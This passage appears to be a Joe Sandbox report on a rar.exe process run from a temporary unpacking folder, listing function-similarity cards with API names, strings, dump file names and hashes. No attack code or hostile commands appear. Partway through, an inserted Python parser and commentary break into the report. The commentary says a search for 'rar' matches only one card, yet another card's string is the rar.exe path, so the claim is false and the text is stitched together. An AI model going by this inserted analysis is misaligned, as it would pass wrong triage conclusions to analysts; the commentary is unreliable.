• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
• String ID:
• API String ID: 502429940-0
• Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
• Instruction ID: f055207ec4ced412b2f1200a883835b9a67ee3366f8f3a4654242fc2598676c5
• Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
• Instruction Fuzzy Hash: 06118232614A41D7E3549B24E544669A330FB8ABA0F000231DBBD533E5DF3AE47AC704
APIs
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: gfffffff
• API String ID: 3215553584-1523873471
• Opcode ID: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
• Instruction ID: e926bb93ee9d991247aab85109453c5ef9f6231b7edde4a3e382dd3d8abd7531
• Opcode Fuzzy Hash: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
• Instruction Fuzzy Hash: CA910662B0D3C786EB258F259184378AB99AB25BD0F048171CEAD873D5FE3DE51AC301
APIs
  • Part of subcall function 00007FF6FAA6B6D0: Sleep.KERNEL32(?,?,?,?,00007FF6FAA3CBED,?,00000000,?,00007FF6FAA67A8C), ref: 00007FF6FAA6B730
• new.LIBCMT ref: 00007FF6FAA5CFD9
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: Sleep
• String ID: rar$rev
• API String ID: 3472027048-2145959568
• Opcode ID: 50351231c3f8732b734c05f1f2968c465adcf4732fcc2a7da3cc46214972e448
• Instruction ID: 95f34a9d5685c6800b3a2bf855e594ee73b6e5ba0cf7e92d6a4ce3f153de5954
• Opcode Fuzzy Hash: 50351231c3f8732b734c05f1f2968c465adcf4732fcc2a7da3cc46214972e448
• Instruction Fuzzy Hash: E8A1DF22E097928AEB20DB68C4542BD63A5FF44B84F4540B5DA7E876D6FF2CE54AC304
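The cards above are repetitive enough that picking out the one function that matters (the one in the rar process with a Sleep subcall and the strings rar and rev) by eye is error-prone. The following Python is an added example, not part of the Joe Sandbox report: it parses cards in this layout into records, extracts the API calls from the APIs section, splits the `$`-separated String ID, separates the two numbers of the API String ID, and checks invariants that hold in every card shown here (Opcode ID equals Opcode Fuzzy Hash, and the second API String ID number is 0 exactly when the String ID is empty). The PID read from the dump name and the layout of the snapshot name are inferences from this report's own naming (0000006D is 109, and the snapshot is hcaresult_109_2_7ff6faa20000_rar.jbxd), not documented Joe Sandbox semantics. The sample text is copied from two of the cards above, trimmed, with one Associated line kept to show the stripping of the "Download File" link residue.

```python
"""Parse Joe Sandbox per-function cards (APIs / Strings / Memory Dump Source /
Similarity) into records and triage them.  Added example; anything marked
'inferred' is read off this report's own naming, not Joe Sandbox documentation."""
import re

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
BULLET_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
# "Sleep.KERNEL32(?,...)" or "new.LIBCMT ref: ..." -> (name, module)
API_CALL_RE = re.compile(r"([A-Za-z_]\w*)\.([A-Za-z0-9_]+)(?=\(|\s+ref)")
# Inferred: dump names begin with the PID as 8 hex digits (0000006D == 109, which
# matches "hcaresult_109_..."); snapshot = hcaresult_<pid>_<n>_<imagebase>_<module>.jbxd
DUMP_PID_RE = re.compile(r"^([0-9A-Fa-f]{8})\.")
SNAPSHOT_RE = re.compile(r"^hcaresult_(\d+)_\d+_([0-9a-f]+)_(.+)\.jbxd$")


def parse_records(text):
    """One dict per function (a card starts at 'APIs').  Bullets under APIs are
    kept verbatim, other bullets go to rec['meta'], Associated lines accumulate
    with the 'Download File' link residue removed."""
    records, rec, section = [], None, None
    for line in (l.strip() for l in text.splitlines()):
        if line == "APIs":
            rec = {"apis": [], "meta": {"Associated": []}}
            records.append(rec)
        if line in SECTIONS:
            section = line
        elif rec and line.startswith("•") and section == "APIs":
            rec["apis"].append(line.lstrip("•").strip())
        elif rec and (m := BULLET_RE.match(line)):
            key, value = m.group(1).strip(), m.group(2).replace("Download File", "").strip()
            if key == "Associated":
                rec["meta"]["Associated"].append(value)
            else:
                rec["meta"][key] = value
    return records


def api_calls(rec):  # (name, module, is_subcall) for each call line
    return [(m.group(1), m.group(2), l.startswith("Part of subcall"))
            for l in rec["apis"] if (m := API_CALL_RE.search(l))]


def string_groups(rec):  # 'rar$rev' -> ['rar', 'rev']; empty String ID -> []
    return [s for s in rec["meta"].get("String ID", "").split("$") if s]


def api_string_hashes(rec):  # '3472027048-2145959568' -> (3472027048, 2145959568)
    a, b = rec["meta"]["API String ID"].split("-")
    return int(a), int(b)


def process_ids(rec):  # inferred PID / image base / module, see the regex comment
    d = DUMP_PID_RE.match(rec["meta"].get("Source File", ""))
    s = SNAPSHOT_RE.match(rec["meta"].get("Snapshot File", ""))
    return {"dump_pid": int(d.group(1), 16) if d else None,
            "snapshot_pid": int(s.group(1)) if s else None,
            "imagebase": int(s.group(2), 16) if s else None,
            "module": s.group(3) if s else None}


def check_record(rec):
    """Invariants seen in every card of this report; a violation means the card
    text was mangled in copying, not that the sample did anything."""
    meta, problems = rec["meta"], []
    if meta.get("Opcode ID") != meta.get("Opcode Fuzzy Hash"):
        problems.append("Opcode ID differs from Opcode Fuzzy Hash")
    if (api_string_hashes(rec)[1] == 0) != (not string_groups(rec)):
        problems.append("string hash is 0 with strings present, or nonzero without")
    ids = process_ids(rec)
    if ids["snapshot_pid"] != ids["dump_pid"]:
        problems.append("snapshot PID differs from dump PID")
    return problems


def find_by_string(records, needle):  # cards whose String ID mentions needle
    return [r for r in records if any(needle in s for s in string_groups(r))]


# Constructed sample: two cards copied from the report, trimmed to the lines used here.
SAMPLE = """\
APIs
  • Part of subcall function 00007FF6FAA6B6D0: Sleep.KERNEL32(?,?,?,?,00007FF6FAA3CBED,?,00000000,?,00007FF6FAA67A8C), ref: 00007FF6FAA6B730
• new.LIBCMT ref: 00007FF6FAA5CFD9
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: Sleep
• String ID: rar$rev
• API String ID: 3472027048-2145959568
• Opcode ID: 50351231c3f8732b734c05f1f2968c465adcf4732fcc2a7da3cc46214972e448
• Opcode Fuzzy Hash: 50351231c3f8732b734c05f1f2968c465adcf4732fcc2a7da3cc46214972e448
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
• String ID:
• API String ID: 502429940-0
• Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
• Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
"""

if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        print(i, api_calls(rec), string_groups(rec), api_string_hashes(rec), check_record(rec))
    print("cards mentioning 'rar':", len(find_by_string(parse_records(SAMPLE), "rar")))
```

Run against the full dump, `find_by_string(records, "rar")` returns only the card with the Sleep subcall and the rar/rev strings, which is the function to open first in the rar process; `check_record` flags cards whose hashes or PIDs disagree, which in practice means a copy-paste error rather than a finding, and the concatenated API ID groups are kept as-is because the sorted word tokens cannot be split back into individual API names reliably.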
APIs
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: *
• API String ID: 3215553584-163128923
• Opcode ID: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
• Instruction ID: 604ddb360e157dc0a07a3cb40a7dbc404bec5f6175bd558469a458ae74654943
• Opcode Fuzzy Hash: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
• Instruction Fuzzy Hash: 0971627391865286E7648F38804103E37A0FB45F58F2411B6DA6AC23DDEF39D68AD725
APIs
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: e+000$gfff
• API String ID: 3215553584-3030954782
APIs
• GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF6FAA4475B,?,00000000,?,?,00007FF6FAA44620,?,00000000,?), ref: 00007FF6FAA54633
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: UNC$\\?\
• API String ID: 1611563598-253988292
APIs
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: FileModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe
• API String ID: 3307058713-2129694862
APIs
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: AttributesFilewcsstr
• String ID: System Volume Information\
• API String ID: 1592324571-4227249723
APIs
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: LoadString$fflushswprintf
• String ID: %d.%02d$[
• API String ID: 1946543793-195111373
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: snprintf
                                                                                                                                                                                                                                • String ID: $%s$@%s
                                                                                                                                                                                                                                • API String ID: 4288800496-834177443
                                                                                                                                                                                                                                • Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                                                                                                                                                                                                • Instruction ID: a760a9466c991b522cd11432e136dfc289ba78e84f319784a28475f459cf97c7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4631AD62A18E8295EB118F59E4407B927A0FF46784F401072EE2D97BD9EE3DE50FDB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: swprintf
                                                                                                                                                                                                                                • String ID: fixed%u.$fixed.
                                                                                                                                                                                                                                • API String ID: 233258989-2525383582
                                                                                                                                                                                                                                • Opcode ID: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                                                                                                                                                                                                • Instruction ID: 362eb8f0e32feda82da7b7486c6cd5bf08d7409057e2cb8395b09f4c62ab4ecc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2931A662A1868156EB109B25E5013EA6760FB45790F504172EE6D976DAFE3CD10FCB10
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LoadString
                                                                                                                                                                                                                                • String ID: Done
                                                                                                                                                                                                                                • API String ID: 2948472770-499744565
                                                                                                                                                                                                                                • Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                                                                                                                                                                                                • Instruction ID: 5c50a4be1033d63971349525c9da859516025af59b1fed0ca624d4ca46ecc1f5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC116D71B18B4586E7108F1AE940069B7A1FB99FC0F54857ACE2CC33A5FE3DE54B8644
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: swprintf
                                                                                                                                                                                                                                • String ID: ;%%0%du
                                                                                                                                                                                                                                • API String ID: 233258989-2249936285
                                                                                                                                                                                                                                • Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                                                                                                                                                                                                • Instruction ID: 4cc6f53f68ea30be4eb5985fff9e94d94ce79bf82ae2be49c977b9d68a6abe64
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18119032B1868186E7209F25E4103E973A0FB88784F584071DB9D8779AEE3CE95ACB40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA542CC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6FAA5430F
                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,00007FF6FAA40BED,?,?,00000000,?,?,00007FF6FAA3F30F,00000000,00007FF6FAA26380,?,00007FF6FAA22EC8), ref: 00007FF6FAA4337E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: InformationVolumeswprintf
• String ID: FAT$FAT32
• API String ID: 989755765-1174603449
• Opcode ID: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
• Instruction ID: 99cf1157c272641e5b8c69af5694730b0d1d9e957c6bd017ba36baf769ba44a2
• Opcode Fuzzy Hash: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
• Instruction Fuzzy Hash: 8F114231A1CA8241F7609B10E8812A66395FF85344F805075E95DC7ADAFF3DE11ECB14
APIs
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: ErrorExceptionLastObjectSingleThrowWait
• String ID: WaitForMultipleObjects error %d, GetLastError %d
• API String ID: 564652978-2248577382
• Opcode ID: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
• Instruction ID: 36664ab1982edc3abb4703c617b5a6a1e618847335effe3dfa303e5996c69b8a
• Opcode Fuzzy Hash: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
• Instruction Fuzzy Hash: 53E04F22E1890282E740A724EC820753351AF657B4F9007B0D03EC26E5BF3DA55F8301